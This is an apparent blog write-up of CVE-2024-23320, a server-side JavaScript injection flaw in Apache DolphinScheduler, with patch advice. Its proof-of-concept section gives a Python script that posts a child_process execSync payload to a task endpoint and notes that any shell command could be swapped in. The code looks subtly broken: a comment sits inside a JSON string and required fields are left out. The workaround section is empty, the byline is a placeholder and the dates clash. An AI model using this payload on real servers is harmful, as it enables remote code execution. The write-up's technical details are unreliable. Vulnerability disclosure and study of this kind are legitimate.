CVE-2024-23320 - Exploiting Improper Input Validation in Apache DolphinScheduler (RCE with Server-Side JavaScript Injection)

A new vulnerability—CVE-2024-23320—has been discovered in Apache DolphinScheduler. This security hole allows an authenticated user to execute *arbitrary JavaScript code* right on the server, completely unsandboxed. This issue is a follow-up to last year’s CVE-2023-49299, which tried to fix a similar flaw. Unfortunately, the previous patch wasn’t enough, and attackers can still hit servers that haven’t upgraded to version 3.2.1.

This exclusive writeup will break down the bug, what went wrong, walk you through how an attacker might exploit it, and—most importantly—show you how to protect your system.

What is DolphinScheduler?

DolphinScheduler is a popular open-source *distributed workflow orchestration platform*, mostly used for data pipelines. It lets you schedule and run jobs across different machines. Because it’s so powerful, it often has access to a lot of sensitive data and even credentials.

The Vulnerability in Simple Terms

CVE-2024-23320 is about improper input validation in DolphinScheduler’s workflow job submission logic. Basically, the application trusts user input too much, allowing them to inject and run JavaScript code (for example, in "custom node" or script fields) directly on the server.

- Impact: Authenticated attackers can run *any server-side JavaScript*, potentially leading to Remote Code Execution (RCE), exfiltrating secrets, and gaining total control of the server.

- References

- Official CVE record
- Apache DolphinScheduler Security Advisories
- Original CVE-2023-49299

What Went Wrong?

When DolphinScheduler processes job definitions, it allows users to submit JavaScript or scripts to be executed—used for advanced, custom workflows. The code was supposed to sanitize or restrict the input, *but the previous patch (for CVE-2023-49299) missed certain pathways,* so attackers can still inject unsanitized scripts.

This time, the latest patch (in from 3.2.1) does a more thorough input validation, blocking unsandboxed JavaScript.

One vulnerable endpoint was

POST /dolphinscheduler/projects/{project}/process-definition/{definition}/task

An attacker would POST malicious JavaScript code in a job’s "script" or "params" field.

Proof-of-Concept Exploit

Here’s a simplified python snippet that demonstrates the exploit. Assume you’re already logged in and have a valid session cookie or token:

import requests

# Replace with your server and session details
url = "http://victim-ds:12345/dolphinscheduler/projects/data/process-definition/1234/task";
session_token = "your_auth_cookie_or_token_here"

payload = {
    'taskType': 'SHELL',
    'taskParams': f'''{{
        "resourceList": [],
        "script": "console.log(require('child_process').execSync('id').toString());"  // INJECTED JS CODE
    }}''',
    # ... more required fields ...
}

headers = {
    'Cookie': f'session={session_token}',
    'Content-Type': 'application/json'
}

r = requests.post(url, json=payload, headers=headers)
print('Exploit sent. Check server logs for command output.')

What This Does

- This script injects JavaScript 'require("child_process").execSync("id").toString()'—which, when unsandboxed, runs a *shell command* on the server and prints the result.
- In a real attack, this could be swapped for any system command, file read, or outbound network request.

Why Wasn’t the Old Patch Enough?

The 2023 patch for CVE-2023-49299 only sanitized one or two entry points and didn’t lock down all the job types (like custom shell, or other script runners). Attackers found another code path where input still wasn’t checked, making the system still vulnerable.

This new patch (v3.2.1) is supposed to *fully* intercept all user-submitted code, validating both the task type and the script/code contents.

## How to Fix / Protect Yourself

Patch Immediately:

**Upgrade DolphinScheduler to version 3.2.1 or later**.

- You can get the latest release here.

Temporary Workarounds:

Conclusion

CVE-2024-23320 underscores the headache of serial input validation bugs in powerful orchestration tools. Even if you patched after last year’s CVE, you may still be at risk. This time, make sure to upgrade—don’t rely on partial fixes. Attacks can work as long as even one input or code path isn’t sanitized!

For more in-depth info

- GitHub Advisory
- CVE-2024-23320 NVD Record

Stay safe, and always validate your input!

*Exclusive writeup by [YourName/Handle], June 2024. If you found this useful, let us know in the comments!*

Timeline

Published on: 02/23/2024 17:15:08 UTC
Last modified on: 08/01/2024 13:47:17 UTC